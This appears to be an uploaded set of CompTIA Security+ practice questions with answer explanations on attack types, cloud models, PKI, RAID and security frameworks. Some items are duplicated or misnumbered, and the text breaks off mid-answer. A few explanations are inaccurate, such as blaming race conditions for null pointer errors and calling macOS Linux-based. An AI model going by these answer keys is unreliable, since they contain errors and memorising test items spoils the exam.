Add to collection(s) Add to saved
  1. No category
Uploaded by hem_ jesti

All comptia wrong

advertisement 
1. A user answers a phone call from what it thinks is a trusted organization. The caller attempts to
get the individual to enter account details via the phone. It turns out the caller ID was fake.
What type of exploit is this?
Vishing, also known as voice phishing, is an attack in which the attacker uses a fake caller ID to appear as
a trusted organization and attempts to get an individual to enter account details via the phone.
Pharming redirects victims to a bogus website, even if the user correctly entered the intended site. To
accomplish this, the attacker employs another attack, such as DNS cache poisoning.
Phishing is an attempt to acquire sensitive information by masquerading as a trustworthy entity via
electronic communication, usually an email.
2. An attacker wants to perform brute force attacks against the Windows-based SAM file and
Linux-based /etc/passwd file. What term is commonly used for these types of attacks?
The Window-based Security Account Manager (SAM) file and the /etc/shadow file for Linux-based
systems both contain passwords. These are extremely popular targets for offline brute force attacks.
3. What can cause null pointer errors in which an application dereferences a pointer that it expects
to be valid but is really null, resulting in a system crash?
A race condition, which occurs when a system or device tries to perform two or more operations at the
same time, can cause null pointer errors in which an application dereferences a pointer that it expects to
be valid but is really null, resulting in a system crash.
4. A developer writes a piece of code to provide compatibility for an incompatible device driver.
What is the name of the piece of code the developer has written?
In the case of incompatible device drivers, a developer can either write a shim (a piece of code between
two components that is capable of intercepting calls) to provide compatibility or rework the existing
driver through refactoring. Shimming can also be used as a sophisticated hack. After an attacker installs
a shim, once calls are intercepted, the shim can handle the operation, make changes and even
redirecting the call.
5. Aiysha is receiving unsolicited photos and messages on her Bluetooth-enabled device. What is
she the victim of?
Aiysha is the victim of Bluejacking. Bluejacking involves the receipt of unsolicited photos or messages
from a nearby device to another Bluetooth-enabled device, such as a smartphone. Bluesnarfing is
associated with dangerous attacks that can expose or alter a user’s information, whereas Bluejacking is
simply sending unsolicited messages to a Bluetooth device.
6. An attacker sends a deauthentication frame to a wireless access point (WAP) from a spoofed
user’s MAC address. The attacker’s goal is to deny service between the user and the access
point and then get the user to connect to an evil twin so the attacker can capture the user’s
packets and credentials. What type of attack is this?
In a disassociation attack, the attacker disassociates the user from the authenticating wireless access
point and then carries out another attack to attain the user’s valid credentials. A main purpose of this
attack is to get the user to connect to an evil twin access point so the attacker can steal the user’s
credentials or data.
7. What deception technology is used to make a honeypot look as enticing as possible to an
attacker?
Deception technologies such as fake telemetry are used to lure attackers to honeypots and honeynets.
For example, a honeypot may be configured to look like a regular system in full operation with user
logins, running services, and the like.
8. Which of the following is a proactive approach to finding an attacker before alerts are triggered?
Threat hunting is a proactive approach to finding an attacker before alerts are triggered. A threat hunter
is looking to disrupt the attacker during any phase of the cyber kill chain.
9. Which of the following best describes SaaS?
Involves the delivery of a licensed application to customers over the Internet for use as a service on
demand.
10. What allows for the connection of on-premises networks to cloud-hosted networks?
An infrastructure as a service (IaaS) transit gateway allows for the connection of on-premises networks
to cloud-hosted networks. Demilitarized zone is incorrect.
11. Which cloud deployment model is the best choice when an organization requires scalability,
wants reduced costs, lacks in-house administrative personnel, and has a high-maintenance,
distributed network?
The advantages of using a public cloud include lower infrastructure, maintenance, and administrative
costs; greater hardware efficiency; reduced implementation time; and availability of short-term usage.
12. Which of the following is much like a power strip that distributes power to critical equipment?
For a home office user, a managed power distribution unit (PDU) is much like a power strip. For data
centers, however, PDUs distribute power to critical equipment. Many PDUs have advance functions to
improve the power quality and provide load balancing as well as remote monitoring.
13. Which statement is NOT true regarding SCADA and ICS?
SCADA is a subset of ICS. An ICS is managed via a SCADA system that provides a Human Machine
Interface (HMI) for operators to monitor the status of a system. In addressing SCADA security concerns,
one of the first lines of defense against attacks is to implement physical segregation of internal and
external networks to reduce the attack surface by segregating the SCADA network from the corporate
LAN. By establishing an electronic security perimeter, it is possible to further segregate a SCADA LAN
from the field device network containing the RTUs and PLCs. A targeted terrorist attack against an ICS
poses a threat to the infrastructure. Ideally, two separate security and IT groups should manage the
network infrastructure and the ICS or SCADA network.
14. Denise needs to install network cabling between the server room ceiling and the floor of the
building’s next level. What type of cable must she use to comply with fire codes?
The plenum is the space between the ceiling and the floor of a building’s next level. It is commonly
used to run network cables. The cables in this part of a building must be plenum grade to comply with
fire codes. The outer casing of this type of cable is more fire resistant than in regular twisted-pair cable.
15. Richard wants to use public key cryptography to send an encrypted message to Racheal. What
key does he need to use to encrypt the message?
Richard needs to use Racheal’s public key to encrypt the message. The other answers are incorrect.
Racheal will then read the message, using her private key. Richard could sign the message using his
private key, and Racheal could use his public key to ensure that his signature is valid.
16. Gonzalo wants to enable a security technology for essential Windows programs and services
that can prevent security threats from executing code on his system. What built-in security
technology should he enable?
Data Execution Prevention (DEP) is a security technology that can prevent security threats from
executing code on a system. DEP works by preventing malware from executing in memory space that is
reserved for operating system processes, programs, and services.
17. Fay, a game developer, is using a white-box software testing process for detecting bugs that
takes a thorough approach to bug detection in the early stages of program development. What
type testing process is she using?
The idea behind static analysis is to take a thorough approach to bug detection in the early stages of
program development. It is a method used to debug source code against other code before it is actually
run.
18. Wilfred needs an all-in-one appliance that includes security-related functions such as spam
filtering, content filtering, and antivirus protection. Which of the following would suit his needs?
Unified threat management (UTM) security appliances contain varying information security–related
functions, including spam filtering functions and antivirus protection. Other features may include, for
example, email filtering, DLP, content filtering, and application layer firewall. With these devices,
updates are often posted hourly to ensure that the latest definitions are in place. As with any other
appliance that provides multiple functions, UTM is a single point of failure (SPOF).
19. Which of the following does not require browser plug-ins and is considered an easy-to-set-up,
secure remote access solution alternative to using an SSL-based VPN?
An HTML5-based remote access solution does not require browser plug-ins (or worrying about
constantly updating insecure plug-ins) and is considered a secure remote access solution alternative to
using an SSL- or TLS-based VPN. It is an easy-to-use pure browser-based solution that can increase
productivity as well as security.
20. Which is a subnet or segmented zone of the public portion of a company’s IT infrastructure that
grants resource access to partners and resellers that have proper authorization and
authentication?
An extranet is a subnet or segmented zone of the public portion of a company’s IT infrastructure that
grants resource access to partners and resellers that have proper authorization and authentication. This
type of arrangement is commonly used in business-to-business relationships. An extranet can open an
organization to liability, so care must be taken to properly configure VPNs and firewalls to strictly
enforce security policies.
21. Which NAC solution is implemented through Active Directory or an IPS solution and verifies that
end devices comply with the access policy?
Agentless network access control (NAC) solutions are mainly implemented through embedded code in
an Active Directory domain controller. The NAC code verifies that the end device complies with the
access policy when a user joins the domain, logs on to, or logs out of the domain. Another instance in
which an agentless solution is deployed is through an intrusion prevention system (IPS).
22. Ling just purchased and installed a new SOHO router, complete with WPA3. What does WPA3
use to prevent offline password attacks?
WPA3 helps prevent offline password attacks by using Simultaneous Authentication of Equals (SAE).
This allows users to choose easier-to-remember passwords and, through forward secrecy, does not
compromise traffic already transmitted even if the password becomes compromised.
23. Which of the following can help you identify unusual activity based on regular review of all
accounts and then disable and remove any unneeded credentials?
With a baseline, you can identify unusual activity based on regular review of all accounts (including
“permanent” machine and service accounts) and then disable and remove any unneeded credentials.
24. What should you use to ensure that the processes for user account provisioning, life cycle
management, and termination are followed and enforced?
The purpose of continuous monitoring is to ensure that the processes for user account provisioning, life
cycle management, and termination are followed and enforced. Continuous monitoring begins with
knowing what user account activity should be present. Continuously monitoring user access enables you
to detect unauthorized access from attackers using system backdoors and to avert widescale incidents.
25. A client sends its authentication details to a key distribution center. What authentication
protocol is being implemented?
With Kerberos authentication, a client sends its authentication details not to the target server but to a
key distribution center (KDC).
26. Ingrid needs to troubleshoot DNS servers and resolve name resolution issues. What commandline utilities should she use?
nslookup and dig can be used to troubleshoot DNS servers and resolve name resolution issues by
querying a DNS server to check whether the correct information is in the zone database. nslookup is
used on Windows-based systems; dig, which stands for Domain Information Groper, is used on Mac and
other Linux-based systems.
27. Andrea suspects that a file is infected with malware. What sandboxed malware analysis tool can
she place the file in to get a report detailing the file’s behavior?
Cuckoo is a malware analysis tool. Essentially, you provide Cuckoo with a file, and it returns results
indicating what the file did when it was executed in an isolated sandboxed environment.
28. What is the framework that Lockheed Martin developed to help defend its networks based on
the actions that an attacker takes?
Lockheed Martin developed a framework to help defend its networks based on the chain of actions that
an attacker takes from beginning to end. This model, which has since been adopted by the security
industry, is known as the cyber kill chain.
29. Frederica would like to use an alternative to NetFlow. She needs a network monitoring tool that
samples packets and provides analysis to identify unauthorized network activity and investigate
DDoS attacks. What should she use?
An alternative to NetFlow is sFlow (short for sampled flow), which is also used for network monitoring.
sFlow samples packets and provides analysis to identify unauthorized network activity and investigate
DDoS attacks.
30. What is based on a NetFlow implementation and serves as an industry standard for the export
of flow information from network devices such as routers?
IPFIX (Internet Protocol Flow Information Export) is based on a NetFlow implementation and serves as
an industry standard for the export of flow information from network devices. It is an Internet
Engineering Task Force (IEFT) protocol created out of the need to facilitate measurement, billing, and
accounting services.
31. Alice is reading a document describing what steps to take during and after specific types of
cybersecurity attacks against the company. What is she reading?
A playbook describes manual orchestration of incident response. For example, each specific incident
and threat has its own playbook. As a result, the response that an organization takes is formalized in a
step-by-step procedure.
32. The forensics team has collected malware signatures, IP addresses, domain names, and file hash
values. What is the term for these components or other evidence that point to a security
breach?
Indicators of compromise (IOC) are evidence or components that point to a security breach or event.
IOC can include items such as malware signatures, IP addresses, domain names, and file hash values.
ISACs is incorrect.
33. Of the following, which can most easily be thought of as a very large set of precomputed hash
values for every possible combination of characters that is able to reverse cryptographic hash
functions?
A rainbow table can most easily be thought of as a very large set of precomputed hash values for every
possible combination of characters that is able to reverse cryptographic hash functions. If an attacker
has enough resources to store an entire rainbow table in memory, a successful attack on the hashed
passwords can occur with great efficiency.
34. An attacker wants to perform brute force attacks against the Windows-based SAM file and
Linux-based /etc/passwd file. What term is commonly used for these types of attacks?
Offline Attack. The Window-based Security Account Manager (SAM) file and the /etc/shadow file for
Linux-based systems both contain passwords. These are extremely popular targets for offline brute force
attacks. Online is incorrect.
35. Which control type includes organizational culture and physical controls that form the outer line
of defense against direct access to data, such as protecting backup media and paying attention
to facility design details?
Operational controls include organizational culture and physical controls that form the outer line of
defense against direct access to data, such as protecting backup media; securing output and mobile file
storage devices; and paying attention to facility design details, including layout, doors, guards, locks, and
surveillance systems. Technical controls are security controls that are executed by technical systems.
Technical controls include logical access control systems, security systems, encryption, and data
classification solutions. Managerial controls (or administrative controls) include business and
organizational processes and procedures, such as security policies and procedures, personnel
background checks, security awareness training, and formal change-management procedures. The
attribute-based access control (ABAC) authorization process is determined by evaluating rules and
policies against attributes associated with an entity, such as the subject, object, operation, or
environment condition.
36. Which cloud service model delivers the entire computer infrastructure in a hosted service model
over the Internet?
Infrastructure as a service (IaaS) involves delivering the computer infrastructure in a hosted service
model over the Internet. This method of cloud computing allows the client to outsource everything that
would normally be found in a typical IT department: Data center space, servers, networking equipment,
and software can all be purchased as services. SaaS is incorrect. Software as a service (SaaS) involves
delivering a licensed application to customers over the Web for use as a service on demand. A SaaS
vendor hosts an application and allows a customer to use the application, usually for a set subscription
period, after which the application becomes inactive if not renewed. PaaS is incorrect. Platform as a
service (PaaS) involves delivering a platform to develop and manage applications over the Internet,
without downloads or installation. XaaS is incorrect. IaaS, PaaS, SaaS, and so on are collectively known
as XaaS, or anything as a service. This term covers the wide variety of products and services that may be
implemented as services over the Internet.
37. Which of the following is a black-box software-testing process in which semirandom data is
injected into a program or protocol stack to detect bugs?
Fuzzing is a black-box software-testing process in which semirandom data is injected into a program or
protocol stack to detect bugs. Fuzzing is based on the assumption that every program has bugs. Static
analysis is incorrect because static analysis is a white-box software testing process for detecting bugs.
The idea behind static analysis is to take a thorough approach to bug detection in the early stages of
program development. Stress testing is incorrect. Stress testing tests how much stress an application or
a program can withstand before it breaks. Stress testing uses methods to overload the existing
resources in an attempt to break the application. The primary purpose of stress testing is to assess the
behavior of the application beyond normal conditions. Sandboxing is incorrect. Sandboxing allows
programs and processes to be run in an isolated environment to limit access to files and the host
system.
38. Which type of key is designed to be used for a single transaction or session?
An ephemeral key is designed to be used for a single transaction or session. The term ephemeral is
increasingly being used in computer technology; it describes something of a temporary or short
duration. It refers to the use of keys as well as compute systems themselves and communication ports.
Static is incorrect because static keys are designed for long-term use. KDF is incorrect because in reliable
cryptographic systems, the password is used as an input to a key derivation function (KDF), which is used
to derive the actual key based on the password as just the origin point. Stretched is incorrect. Key
stretching runs a password through an algorithm to produce an enhanced key, which is usually at least
128 bits long.
39. Your large Canadian enterprise organization collects, uses, stores, and processes personal
information and is about to be audited. What law should you be most concerned with?
The Personal Information Protection and Electronic Documents Act (PIPEDA) is a Canadian law that
governs the collection and use of personal information. GDPR is incorrect because the General Data
Protection Regulation (GDPR) strengthens and unifies data protection for individuals within the
European Union (EU). Privacy Rule and HIPAA are incorrect because in the United States, the Health
Insurance Portability and Accountability Act (HIPAA) and its Privacy Rule regulate the use and disclosure
of private health information (PHI) for organizations.
40. What type of control is used when the original control becomes unavailable?
Compensating controls are alternate controls that are intended to reduce the risk of an existing or
potential control weakness. They can include audit trails and transaction logs that someone in a higher
position reviews. Compensating controls are used when the original controls become unavailable. For
example, a backup generator is considered a compensating control. Preventive controls attempt to
prevent unwanted events by inhibiting the free use of computing resources. Preventive controls are
often hard for users to accept because they restrict free use of resources. Detective controls attempt to
identify unwanted events after they have occurred. Common technical detective controls include audit
trails, intrusion detection systems, system monitoring, checksums, and anti-malware. Corrective
controls are reactive and provide measures to reduce harmful effects or restore the system that is being
affected. Examples of corrective controls include operating system upgrades, data backup restoration,
vulnerability mitigation, and anti-malware.
41. An administrator has created the credentials on the database that an application will use and
stored the credentials in the secrets management system as the named secret App-DB-Secret.
Which statement best describes what is happening in step 3 in this illustration?
In order to access the database in the example, the application makes a call to the secrets manager for
the named secret (App-DB-Secret). “The secrets manager is managing the task of rotating the secrets
and programmatically managing retrieval based on API calls” is close but is not the best answer here. In
example illustrated here, steps 1 and 2 aren’t subsequently needed. The secrets manager can manage
the task of rotating the secrets and programmatically managing retrieval based on API calls. “The secrets
management system decrypts App-DB-Secret and securely transmits the credentials to the app by using
transport encryption” is incorrect as this represents step 4, where the secrets management system
decrypts the App-DB-Secret and securely transmits the credentials to the application (not the database)
by using transport layer encryption. “The app is using the credential received to access the database” is
incorrect because this represents step 5, where the application uses the credential received to access
the database.
42. Vladimir is having difficulty managing and responding to security threats and alerts on his
corporate network. Which of the following tools would help him best manage this situation?
A security orchestration, automation, and response (SOAR) platform is valuable for incident mitigation
as it automates data gathering and response. Specific technical response techniques can even be
automated for the most severe vulnerabilities and threats, such as automatically patching systems or
making firewall rule configuration changes. DLP is incorrect. Data loss prevention (DLP) is a technical
control that focuses on detecting and preventing data breach and exfiltration. Based on specific DLP
alerts, SOAR can help automate notifications and combine the alert with additional data to understand
the threat. App allow list and app block/deny list are incorrect. Application allow listing explicitly defines
the applications allowed to be run and is useful in preventing users and attackers from executing
unauthorized applications. Application block/deny is generally done to reduce security-related issues,
particularly where bad actors are known. During an incident, an otherwise allowable destination or
application can be blocked or denied.
43. Aisha is running a bare-metal hypervisor where the software runs directly on the hardware
platform, and the guest operating system runs at the second level above the hardware. What
type of hypervisor is she running?
A Type I native hypervisor, or bare-metal hypervisor, is software that runs directly on a hardware
platform. The guest operating system runs at the second level above the hardware. These hardwarebound virtual machine emulators rely on the real, underlying CPU to execute nonsensitive instructions
at native speed. In hardware virtualization, a guest operating system is run under the control of a host
system, where the guest has been ported to a virtual architecture that is almost like the hardware it is
actually running on. Type II is incorrect. A Type II hypervisor, or hosted hypervisor, is software that runs
in an operating system environment where the guest operating system runs at the third level above the
hardware. A Type II hypervisor runs as an application or a shell on another operating system that is
already running. The following illustration compares Type I and Type II hypervisors. Type III and Type IV
are incorrect because Type III and Type IV are not valid types of hypervisors.
44. Which of the following statements best describes the process of sideloading?
Sideloading is a process by which a user goes around the approved app marketplace and device
settings to install unapproved apps. As with the installation of third-party apps through app stores,
sideloading an app poses a risk to the organization because that app has not been vetted and thus
could introduce malicious software and compromise sensitive corporate data. “A user unlocks a
mobile device in order to move to a different carrier” is incorrect as this describes carrier unlocking. “An
EMM policy is applied to all mobile devices in an enterprise” is incorrect because this describes an
enterprise mobility management (EMM) approach, which might include mobile device management
(MDM), mobile application management (MAM), and identity management. “A device acts as a wireless
access point, and other devices connect to it” is incorrect because this statement describes Wi-Fi Direct.
45. Ingrid needs to troubleshoot DNS servers and resolve name resolution issues. What commandline utilities should she use?
nslookup and dig can be used to troubleshoot DNS servers and resolve name resolution issues by
querying a DNS server to check whether the correct information is in the zone database. nslookup is
used on Windows-based systems; dig, which stands for Domain Information Groper, is used on Mac and
other Linux-based systems. netstat and nbtstat are incorrect. The netstat utility displays all the ports on
which the computer is listening and is useful for quickly determining active connections. It can also
display the routing table and pre-protocol statistics. nbtstat is a diagnostic tool for NetBIOS over TCP/IP
that is primarily designed to help troubleshoot NetBIOS name resolution problems in Windows
operating systems.
46. Which of the following was established to promote industry-specific sharing of threat
intelligence?
Information Sharing and Analysis Centers (ISACs) promote industry-specific sharing of threat
intelligence. The National Council of ISACs lists more than 20 member ISACs. These include multiple
industries, such automotive, aviation, elections infrastructure, and real estate.
47. Which of the following best describe a bug bounty program?
A bug bounty program is a formalized program to identify the bugs that lead to a vulnerability or an
exploit. While bug bounties can be public or private, they have gained widespread appeal as they are
often open to the public for externally facing applications and services delivered from the web. The
company running such a program is free to set not just its own terms but also the dollar amount to be
paid. The participants in a bug bounty program also have no understanding of the inner workings of the
systems, which are usually unknown environments (black boxes). “A bug bounty program is an informal
program in which the rules of engagement are not well defined” is incorrect because, like a
penetration test, a bug bounty program is formal and well defined. Governance, terms, and the rules of
engagement are critical and must be made very clear to those who might want to participate.
48. What two important standards does AIS, an initiative from the U.S. Department of
Homeland Security (DHS) that enables the exchange of cybersecurity threat indicators, use?
Automated Indicator Sharing (AIS) is an initiative from the U.S. Department of Homeland
Security (DHS) that uses Trusted Automated eXchange of Indicator Information (TAXII), which is a
specification for machine-to-machine communications that allows organizations to share security
information with others, as desired, and Structured Threat Information eXpression (STIX), which is a
standardized and structured language representing threat information in a flexible, automatable, and
easy-to-use manner. RFCs is incorrect. Requests for comments (RFCs) are documents that describe
behaviors, methods, research, or innovations that have to do with technologies and the workings of the
Internet and systems connected to the Internet. File/code repositories is incorrect. Software developers
are increasingly using online code repositories (repos) such as GitHub to collaborate, regardless of
location and share code. Many of these repositories are publicly available. Aside from ensuring that your
sensitive data isn’t shared publicly, these repos provide opportunities to attain not just open source
code but even code specific to threat research and information gathering.
49. A fellow security analyst asks you about the flow of network traffic. How would you explain
the east–west traffic concept?
East–west traffic refers to network traffic flow between servers within a data center. “Data
transfers between the data center and the outside of the network” is incorrect because this is north–
south traffic. “Network traffic that has zero trust” is incorrect because zero trust is an evolving
framework that is primarily focused on protecting the resources themselves rather than placing trust in
the entire network, for example, and what is already within that perimeter. “Traffic that goes from New
York to Los Angeles” is incorrect because this is simply an invalid statement regarding network traffic in
the given example.
50. Which of the following best describes SaaS?
Software as a service (SaaS) involves the delivery of a licensed application to customers over
the Internet for use as a service on demand. “Involves the delivery of a computing platform, often an
operating system with associated services, over the Internet without downloads or installation” and
“Involves the delivery of computer infrastructure in a hosted service model over the Internet” are
incorrect. Platform as a service (PaaS) involves the delivery of a computing platform, often an operating
system with associated services, over the Internet without downloads or installation. Infrastructure as a
service (IaaS) involves the delivery of computer infrastructure in a hosted service model over the
Internet. “Addresses security requirements such as visibility, data protection, threat protection, and
compliance across public cloud services” is incorrect because cloud access security broker (CASB)
solutions address security requirements such as visibility, data protection, threat protection, and
compliance across public cloud services.
51. You are considering fault-tolerant RAID options for a new company server that will store
critical data. What RAID variant is displayed in the following illustration?
RAID 5 is displayed in this illustration and will fulfill the fault-tolerance requirements described
here. RAID 5 includes parallel transfer with distributed parity, data is written to all drives
simultaneously, and parity is written in segments across all drives for redundancy of parity, as well as
data segments. RAID 5 requires a minimum of three drives. RAID 0 is incorrect. RAID 0 implements a
striped disk array. It is not fault tolerant. The data is broken into blocks, and each block is written to a
separate disk drive. Implementing RAID 0 requires a minimum of two disks. RAID 1 is incorrect. RAID 1,
which is called mirroring or duplexing, requires a minimum of two disks and offers 100% redundancy
because all data is written to both disks. RAID 10 is incorrect. RAID 10 (also called 1+0) combines RAID 1
and RAID 0 and requires a minimum of four drives. A variant exists, called 0+1. Both RAID 1+0 and RAID
0+1 provide fault tolerance and increased performance.
52. What process is occurring in the steps that follow?
1. A TLS-encrypted web server presents its certificate to the CA to check its validity.
2. The CA responds with the certificate status, including a digitally signed time stamp.
3. The web server “staples” the CA’s signed timestamp to the certificate when a client web
browser connects.
4. The client web browser verifies the signed timestamp.
This process is known as Online Certificate Status Protocol (OCSP) stapling. High-traffic
websites burden the CA with OCSP requests because they may need to respond to an overwhelming
number of certificate validity requests. OCSP stapling helps reduce this load by allowing the web server
to “staple” a timestamped OCSP response as part of the TLS handshake with the client. The web server,
instead of the CA, is then responsible for handling OCSP requests. Certificate pinning is incorrect.
Certificate pinning is essentially associating, or “pinning,” a host to its expected public key. This method
extends beyond typical certificate validation to thwart man-in-the-middle attacks. Certificate revocation
is incorrect. Digital certificates can be revoked. Revoking a certificate invalidates a certificate before its
expiration date. Revocation occurs for several reasons. For example, a private key might become
compromised, the private key might be lost, or the identifying credentials might no longer be valid. Root
signing is incorrect. A root signing certificate is usually provided by a recognized CA. Organizations with a
root signing certificate thus can sign for themselves any number of certificates. These certificates, in
turn, will be trusted by those outside the organization because web browsers include, by default, many
trusted certificates for recognized CAs.
53. Which of the following statements regarding certificate formats are true?
Binary-encoded Distinguished Encoding Rules (DER) certificates are common on Java
platforms. The P7B, also known as PKCS#7, format uses the .p7b or .p7c file extension, which is
commonly supported on Windows operating systems and Java Tomcat. “PEM is most commonly
associated with Windows web servers” is incorrect. The most common format and extension for
certificates is privacy-enhanced mail (PEM), which is most commonly associated with Apache web
servers, not Windows web servers. The PEM format is a Base64 ASCII-encoded text file, which makes
copying the contents from one document to another simple. “PFX is most commonly associated with
Apache web servers” is incorrect. Extensions for personal information exchange (PFX)–encoded
certificates include .pfx and .p12. This type of certificate is common to Windows operation systems, not
Apache web servers, for importing and exporting certificates and private keys.
54. U.S. federal agencies are required to follow the NIST Risk Management Framework (RMF).
What more recent framework did NIST release that organizes cybersecurity activities at their highest
level?
NIST relatively recently introduced the NIST Cybersecurity Framework (CSF), which resulted
from a collaboration between the government and the private sector. CSF organizes cybersecurity
activities at their highest levels. These highest levels are called functions and include Identify, Protect,
Detect, Respond, and Recovery. COBIT is incorrect. Control Objectives for Information and Related
Technology (COBIT) is a set of best practices for IT management. COBIT is most commonly used to attain
compliance with the Sarbanes-Oxley Act (SOX). ISO/IEC 27001 is incorrect. ISO/IEC 27001 is a standard
for information security management, for which organizations may be certified if they meet the
requirements. ISO/IEC 27701 is incorrect. ISO/IEC 27701 extends ISO 27001 with enhancements for
privacy in order to establish and maintain information management systems specific to privacy.
55. Abraham is reading about an IEEE standard for port-based access control. This standard
specifically provides for the encapsulation of EAP over the IEEE family of standards for packet-based
networks and facilitates the use of various authentication methods, such as RADIUS and digital
certificates. What standard is he reading about?
802.1X is an Institute of Electrical and Electronics Engineers (IEEE) standard for port-based
access control and provides a method for authenticating a device to another system via an
authentication server. 802.1X specifically provides for the encapsulation of Extensible Authentication
Protocol (EAP) over the IEEE family of standards for packet-based networks. The standard essentially
facilitates the use of various authentication methods, such as RADIUS, digital certificates, and onetime password devices. 802.11 is incorrect. Don’t confuse 802.1X with 802.11. 802.11 is specific to
wireless technology and is the original IEEE wireless specification. SAML and OASIS are incorrect.
Security Assertion Markup Language (SAML) is an Extensible Markup Language (XML) framework for
creating and exchanging security information between online partners. It is a product of the OASIS
Security Services Technical Committee. Most cloud and software as a service (SaaS) service providers
favor SAML because it provides authentication assertion, attribute assertion, and authorization
assertion.
56. Which of the following prevents malicious website traffic from infecting internal company
resources by allowing users to access only approved websites?
A next-generation secure web gateway (SWG) prevents malicious website traffic from infecting
internal company resources by allowing users to access only approved websites. All other sites are
blocked. Cloud access security brokers (CASBs) along with SWG provide the capability to deliver static
and dynamic access to the management plane of IaaS providers, just as they do any SaaS app.
DevSecOps is automated and continuous process management for continual integration and delivery of
secure applications. Security information and event management (SIEM) ingests, correlates, and
prioritizes events for deeper visibility into anomalous behavior and threat mitigation. A virtual private
cloud (VPC) endpoint allows a VPC to be connected with other services without the need for additional
technologies, such as a VPN connection or an Internet gateway.
57. Which of the following is a small operating system used in embedded systems and IoT
applications that are typically run in an SoC environment?
A real-time operating system (RTOS) is a small operating system used in embedded systems
and IoT applications that are typically run in an SoC environment. MFD is incorrect. A multifunctional
device (MFD) is typically a printer that can also scan, copy, and fax. Enterprise printers and MFDs need
to be included in security policies and protected just like any other network devices. Often security tools
neglect to block access from a printer running old, vulnerable firmware. HVAC is incorrect. Heating,
ventilation, air conditioning (HVAC) devices use embedded systems to efficiently run environmental
systems and reduce wasted energy. Some HVAC monitoring software is not well updated or runs on
older vulnerable versions of software. Zigbee is incorrect. Zigbee is a wireless set of protocols for
wireless personal area networks (WPANs).
58. Which of the following assigns a random surrogate value with no mathematical relationship
and can be reversed by being linked back to the original data?
With tokenization, you assign a random surrogate value with no mathematical relationship. You
can reversed it by linking the token back to the original data. Outside the system, a token has no value;
it is just meaningless data. Data masking is incorrect. Data masking desensitizes or removes sensitive or
personal data, but the data is still usable. The data is substituted for false data that appears real.
Hashing is incorrect. Hashing is used to calculate a short secret value from a data set of any size (usually
for an entire message or for individual transmission units). This secret value is recalculated
independently on the receiving end and is compared to the submitted value to verify the sender’s
identity. Redaction is incorrect. Redaction is a process of obscuring data by replacing all or part of the
content for security or privacy purposes. When physical documents are redacted, parts of the text are
blacked out; redaction in information systems often uses the asterisk character to obscure data.
59. Data classification and appropriate data ownership roles are key elements in an
organization’s security policy. Who is responsible for implementing the data classification and security
controls?
A data custodian/steward is responsible for implementing data classification and security
controls, given the classification determined by the data owner. The data custodian is also known as the
data steward. The other answers are incorrect. The data owner is responsible for a specific information
asset. This is often a senior person in a department or division. For example, the vice president of
human resources (HR) could be the data owner for all employee data. The data owner is responsible for
determining the classification level of the data. The data protection officer (DPO) is responsible for legal
compliance with data privacy regulations and manages data protection risk that relates to ensuring the
proper management of personal and protected information. For example, HIPAA requires covered
entities to designate a privacy officer.
60. Bob, a security analyst, has recently discovered a cryptographic method of attack against a
secure hash. What type of attack has he identified?
A birthday attack is a cryptographic method of attack against a secure hash. It is based on
what is known as the birthday paradox. Downgrade is incorrect because a downgrade attack is often a
result of security configurations not being updated. Often this stems from the desire to maintain
backward compatibility. Password spraying is incorrect. Password spraying is an attack that attempts to
access a large number of user accounts with a very small number of commonly used passwords.
Skimming is incorrect because skimming involves copying data from an ATM or other card by using a
specialized terminal and cloning by encoding the stolen data onto a blank card.
61. Which of the following is a fixed-size input of a random or pseudo-random value that helps
ensure that each message encrypts differently?
An initialization vector (IV) is a fixed-size input of a random or pseudo-random value. In
cryptography, an IV helps ensure that each message is encrypted differently. You would not want the
same message, encrypted with the same key, to have the same resulting cipher text. Symmetric key is
incorrect. A symmetric key is a single cryptographic key used with a secret key (symmetric) algorithm.
The symmetric key algorithm uses the same private key for both encryption and decryption operations.
PKI is incorrect. A public key infrastructure (PKI) uses trusted third parties that certify or provide proof of
key ownership. Entropy is incorrect because entropy simply means randomness or lack of order.
62. Which of the following provides authentication to a CA on the validity of a client’s certificate
request?
A registration authority (RA) provide authentication to a certificate authority (CA) on the
validity of a client’s certificate request; in addition, the RA serves as an aggregator of information. PEM
is incorrect because the most common format and extension for certificates is privacy-enhanced mail
(PEM), which is mostly associated with Apache web servers. CA is incorrect because the CA’s job is to
issue certificates, verify the holder of a digital certificate, and ensure that holders of certificates are who
they claim to be. CPS is incorrect because a certification practice statement (CPS) is a legal document
that a CA creates and publishes for the purpose of conveying information to those who depend on the
CA’s issued certificates.
63. You are a security analyst for a large financial institution located on Florida’s Gulf Coast,
where hurricanes and flooding are prevalent. What specific type of recovery site should you have readily
available to ensure that operations continue with the least amount of operational impact?
Because you deal with finances and you need to be up and running with the least amount of
operational impact, you need a hot site. A hot site is a location that is already running and available 7
days a week, 24 hours a day. Such a site allows a company to continue normal business operations,
usually within a minimal period after the loss of a facility. This type of site functions like the original site
and is equipped with all necessary hardware, software, network, and Internet connectivity fully
installed, configured, and operational. The other answers are incorrect. A warm site is a scaled-down
version of a hot site. A warm site is generally configured with power, phone, and network jacks. The site
might have computers and other resources, but they are not configured and ready to go. A cold site is
the weakest of the recovery plan options but also the cheapest. It is less costly in the short term, but
equipment purchased for a cold site after a disaster might be more expensive or difficult to obtain. A
cold site is merely a prearranged request to use facilities, if needed. Electricity, bathrooms, and space
are about the only facilities a cold site contract provides. A disaster recovery site is too general and
could be used to describe any of the sites listed in the other answer options.
64. Which of the following is a smart card used in military, reserve officer, and military
contractor identity authentication systems?
The common access card (CAC) is a credit card–sized “smart” card. It is the standard
identification for active duty uniformed service personnel, selected reserve personnel, DoD civilian
employees, and eligible contractor personnel. It is also the principal card used to enable physical access
to buildings and controlled spaces, and it provides access to DoD computer networks and systems. FAR
is incorrect because the false acceptance rate (FAR) measures the likelihood that an access system will
incorrectly accept an access attempt (in other words, allow access to an unauthorized user). FRR is
incorrect because the false rejection rate (FRR) is the percentage of identification instances in which
false rejection occurs. CER is incorrect. The crossover error rate (CER) is the percentage at which the FAR
and FRR are equal.
65. Which of the following runs a password through an algorithm to produce an enhanced key
that is usually at least 128 bits long?
Key stretching runs a password through an algorithm to produce an enhanced key that is
usually at least 128 bits long. IV is incorrect. An initialization vector (IV) is a fixed-size input of a random
or pseudo-random value. In cryptography, an IV helps ensure that each message encrypts differently.
Steganography is incorrect. Steganography is a commonly used method of obfuscating data, particularly
in media types such as audio, video, image files, and other documents. Entropy is incorrect because
entropy simply means randomness or lack of order. A lack of entropy can have a negative impact on
information security.
67. Which of the following is the conversion of data to its anticipated simplest-known form?
Normalization is the conversion of data to its anticipated simplest-known form. It provides
